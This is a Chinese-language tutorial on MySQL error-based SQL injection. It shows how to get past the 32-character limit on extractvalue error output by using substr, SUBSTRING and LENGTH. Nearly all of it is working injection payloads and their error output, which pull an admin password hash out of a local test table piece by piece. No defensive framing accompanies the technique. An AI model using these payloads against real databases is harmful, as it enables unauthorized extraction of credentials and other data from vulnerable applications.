0x00 概要

在使用 extractvalue或是updatexml报错注入 方法时可能会出现一种情况要获取的数据大于了 32 位导致显示不完整。

这里展示两种常用突破方法

0x01 substr函数

方法1-sql: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(password,1,10),0x7e) FROM test.tdb_admin limit 0,1)))

方法1-sql讲解: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(字段名称,开始读取的位置,指定显示的长度),0x7e) FROM 库名.表名 limit 0,1)))

  1. mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,substr(password,1,10),0x7e) FROM test.tdb_admin limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~7fef617146~'

0x02 SUBSTRING 函数+LENGTH 函数

用法:
substring(str, pos),即: substring(被截取字符串, 从第几位开始截取)
substring(str, pos, length)
即: substring(被截取字符串,从第几位开始截取,截取长度)

使用这个函数的时候最好是搭配 length 函数一起使用,先获取数据长度,然后在通过偏移获取数据

  1. # 测试表数据:
  2. mysql> select * from tdb_admin;
  3. +----+----------+----------------------------------+
  4. | id | username | password                         |
  5. +----+----------+----------------------------------+
  6. |  1 | admin    | 7fef6171469e80d32c0559f88b377245 |
  7. +----+----------+----------------------------------+
  8. 1 row in set (0.00 sec)

先获取某字段的数据长度: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,length(password),0x7e) FROM test.tdb_admin limit 0,1)))

  1. mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,length(password),0x7e) FROM test.tdb_admin limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~32~'

获取前30位的数据: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,1),0x7e) FROM test.tdb_admin limit 0,1)))

  1. mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,1),0x7e) FROM test.tdb_admin limit 0,1)));
  2. ERROR 1105 (HY000): XPATH syntax error: '~~7fef6171469e80d32c0559f88b3772'

select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,31),0x7e) FROM test.tdb_admin limit 0,1)))

sql讲解: select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(字段名,要开始读取的位置),0x7e) FROM 库名.表名 limit 0,1)))

  1. mysql> select * from test where id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x7e,SUBSTRING(password,31),0x7e) FROM test.tdb_admin limit 0,1)));
  3. ERROR 1105 (HY000): XPATH syntax error: '~~45~'